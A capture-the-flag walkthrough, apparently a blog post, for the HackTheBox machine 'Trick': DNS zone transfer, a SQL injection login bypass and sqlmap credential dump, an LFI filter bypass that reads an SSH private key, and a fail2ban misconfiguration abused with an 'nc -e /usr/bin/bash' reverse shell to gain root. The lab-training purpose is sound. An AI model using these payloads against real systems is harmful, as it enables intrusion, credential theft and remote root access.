Trick

An easy Linux box from HackTheBox, get run around rabbit holes until finally discover a subdomain with a LFI, grab a SSH key and use that for initial access, then exploit a vulnerable configuration of fail2ban for root.

Recon

I moved OSs to Pop!_OS, instead of getting Kali on a virtual machine I just opted to save a little harddrive space and only install tools I need.

Running the usual nmap

sudo nmap -sC -sV -oA nmap/init 10.10.11.166

Running a gobuster

gobuster dir -w /opt/seclists/Discovery/Web-Content/raft-medium-directories.txt -x html -t 30 --url 10.10.11.166

Dont find anything but the javascript files and index.html

Now move to the domain server service running on port 53, use dig to do a reverse lookup of the 10.10.11.166 IP and specifically query the domain service running at 10.10.11.166

georgy@pop-os:~/Documents/htb/trick$ dig -x 10.10.11.166 @10.10.11.166

; <<>> DiG 9.18.1-1ubuntu1.2-Ubuntu <<>> -x 10.10.11.166 @10.10.11.166
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 47859
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 11cb663867b6648c6c9e92b263334e326d88fc4539154108 (good)
;; QUESTION SECTION:
;166.11.10.10.in-addr.arpa.	IN	PTR

;; ANSWER SECTION:
166.11.10.10.in-addr.arpa. 604800 IN	PTR	trick.htb.

;; AUTHORITY SECTION:
11.10.10.in-addr.arpa.	604800	IN	NS	trick.htb.

;; ADDITIONAL SECTION:
trick.htb.		604800	IN	A	127.0.0.1
trick.htb.		604800	IN	AAAA	::1

;; Query time: 32 msec
;; SERVER: 10.10.11.166#53(10.10.11.166) (UDP)
;; WHEN: Tue Sep 27 15:25:38 EDT 2022
;; MSG SIZE  rcvd: 163

And find trick.htb!

Now we can do a zone transfer for maybe more inforamtion, and find preprod-payroll.trick.htb!

georgy@pop-os:~/Documents/htb/trick$ dig axfr trick.htb @trick.htb

; <<>> DiG 9.18.1-1ubuntu1.2-Ubuntu <<>> axfr trick.htb @trick.htb
;; global options: +cmd
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.		604800	IN	NS	trick.htb.
trick.htb.		604800	IN	A	127.0.0.1
trick.htb.		604800	IN	AAAA	::1
preprod-payroll.trick.htb. 604800 IN	CNAME	trick.htb.
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 40 msec
;; SERVER: 10.10.11.166#53(trick.htb) (TCP)
;; WHEN: Tue Sep 27 16:20:26 EDT 2022
;; XFR size: 6 records (messages 1, bytes 231)

Add preprod-payroll.trick.htb to /etc/hosts, and navigate to the site

On the site, try a simple sql injection since the URL is .php

' or 1=1-- -

Into the username, and log right in

Immediately see the “Users” section - maybe we can dump the administrator creds via the SQL injection?

Save the login request, and using sqlmap enumerate the databases present

georgy@pop-os:~/Documents/htb/trick$ sqlmap -r login.req --risk=3 --dbs

...
+---------------------+
| information_schema  |
| payroll_db          |
+---------------------+
...

sqlmap finds 2 databases, information_schema, and payroll_db - now enumerating payroll_db tables with

georgy@pop-os:~/Documents/htb/trick$ sqlmap -r login.req --risk=3 -D payroll_db --tables

...
+---------------------+
| position            |
| allowances          |
| attendance          |
| deductions          |
| department          |
| employee            |
| employee_allowances |
| employee_deductions |
| payroll             |
| payroll_items       |
| users               |
+---------------------+
...

sqlmap finds 11 tables, of which the “users” table is the most interesting - so lets dump its contents

georgy@pop-os:~/Documents/htb/trick$ sqlmap -r login.req --risk=3 -D payroll_db -T users --dump

And get some creds for the Administrator / Enemigoss user, the password is SuperGucciRainbowCake

Unfortunately, trying to SSH in as this user doesnt work, and since Ive exhausted the preprod-payroll subdomain, maybe there are other preprod domains?

Using wfuzz

georgy@pop-os:~/Documents/htb/trick$ wfuzz -H "Host: preprod-FUZZ.trick.htb" -w /opt/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hh 5480 http://trick.htb

And it found “marketing”

Quickly add preprod-marketing.trick.htb to /etc/hosts, and navigate to the site

Clicking around, see that there is a direct in-URL reference to the page that I’m on

http://preprod-marketing.trick.htb/index.php?page=services.html

Maybe an LFI?

Try to go to

http://preprod-marketing.trick.htb/index.php?page=/etc/passwd

Doesnt work

http://preprod-marketing.trick.htb/index.php?page=../../../../../../../etc/passwd

Doesnt work

http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././..././etc/passwd

Works! We see /etc/passwd, seems like the site was filtering out ../ from the URL, but not recursively

Exploitation

For just a simple LFI from what looks like a static webpage, there aren’t that many options, pretty much only being able to read a private SSH key

So lets try it, find the “michael” user in the /etc/passwd file, see if we can read his private SSH key by going to the URL

http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././..././..././home/michael/.ssh/id_rsa

And we get it!

Copy it to the working directoy as micheal_ssh

And then connect via SSH to trick.htb, make sure to chmod 600 michael_ssh

georgy@pop-os:~/Documents/htb/trick$ chmod 600 michael_ssh
georgy@pop-os:~/Documents/htb/trick$ ssh -i michael_ssh michael@trick.htb

Linux trick 4.19.0-20-amd64 #1 SMP Debian 4.19.235-1 (2022-03-17) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
michael@trick:~$ whoami
michael
michael@trick:~$

Now start enumerating the box, and find an interesting permission with sudo -l

michael@trick:~$ sudo -l
Matching Defaults entries for michael on trick:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User michael may run the following commands on trick:
    (root) NOPASSWD: /etc/init.d/fail2ban restart

Googling around, find a writeup for how to exploit this privilege for root

Essentially, since we are a member of the security group, can modify how fail2ban works - so whenever someone gets banned (like messing up auth to ssh 3 times), it will run a script

Usually this script bans them, but since we have write access to the action.d directory, we can overwrite the config file and make it send a reverse shell instead of banning us

michael@trick:/etc/fail2ban$ id
uid=1001(michael) gid=1001(michael) groups=1001(michael),1002(security)
michael@trick:/etc/fail2ban$ ls -la
total 76
drwxr-xr-x   6 root root      4096 Sep 27 23:57 .
drwxr-xr-x 126 root root     12288 Sep 27 21:51 ..
drwxrwx---   2 root security  4096 Sep 27 23:57 action.d
-rw-r--r--   1 root root      2334 Sep 27 23:57 fail2ban.conf
drwxr-xr-x   2 root root      4096 Sep 27 23:57 fail2ban.d
drwxr-xr-x   3 root root      4096 Sep 27 23:57 filter.d
-rw-r--r--   1 root root     22908 Sep 27 23:57 jail.conf
drwxr-xr-x   2 root root      4096 Sep 27 23:57 jail.d
-rw-r--r--   1 root root       645 Sep 27 23:57 paths-arch.conf
-rw-r--r--   1 root root      2827 Sep 27 23:57 paths-common.conf
-rw-r--r--   1 root root       573 Sep 27 23:57 paths-debian.conf
-rw-r--r--   1 root root       738 Sep 27 23:57 paths-opensuse.conf

The file we want to create is iptables-multiport.conf in the temp directory, creating a netcat reverse shell when someone is banned

# insie of the iptables-multiport.conf file copied from /etc/fail2ban/action.d
# edit this line and save the file

...
actionban = /usr/bin/nc -e /usr/bin/bash 10.10.14.9 9999
...

Then overwrite the conf file

michael@trick:/tmp$ mv iptables-multiport.conf /etc/fail2ban/action.d/

Then restart the service and start a listener on 9999 and restart the service with

michael@trick:/tmp$ sudo /etc/init.d/fail2ban restart

Then fail authentication to the ssh server a bunch of times

michael@trick:~$ ssh nope@trick.htb
nopeane@trick.htb's password: 
Permission denied, please try again.
nopeane@trick.htb's password: 
Permission denied, please try again.
nopeane@trick.htb's password: 
Permission denied, please try again.

michael@trick:~$ ssh nope@trick.htb
nopeane@trick.htb's password: 
Permission denied, please try again.
nopeane@trick.htb's password: 
Permission denied, please try again.
nopeane@trick.htb's password: 
Permission denied, please try again.

michael@trick:~$ ssh nope@trick.htb
nopeane@trick.htb's password: 
Permission denied, please try again.
nopeane@trick.htb's password: 
Permission denied, please try again.
nopeane@trick.htb's password: 
Permission denied, please try again.

michael@trick:~$ ssh nope@trick.htb
nopeane@trick.htb's password: 
Permission denied, please try again.
nopeane@trick.htb's password: 
Permission denied, please try again.
nopeane@trick.htb's password: 
Permission denied, please try again.

...
...
...

And catch the root shell!

Listening on 0.0.0.0 9999
Connection received on 10.10.11.166 58084
whoami
root

Trick

Recon #

Exploitation #

Recon

Exploitation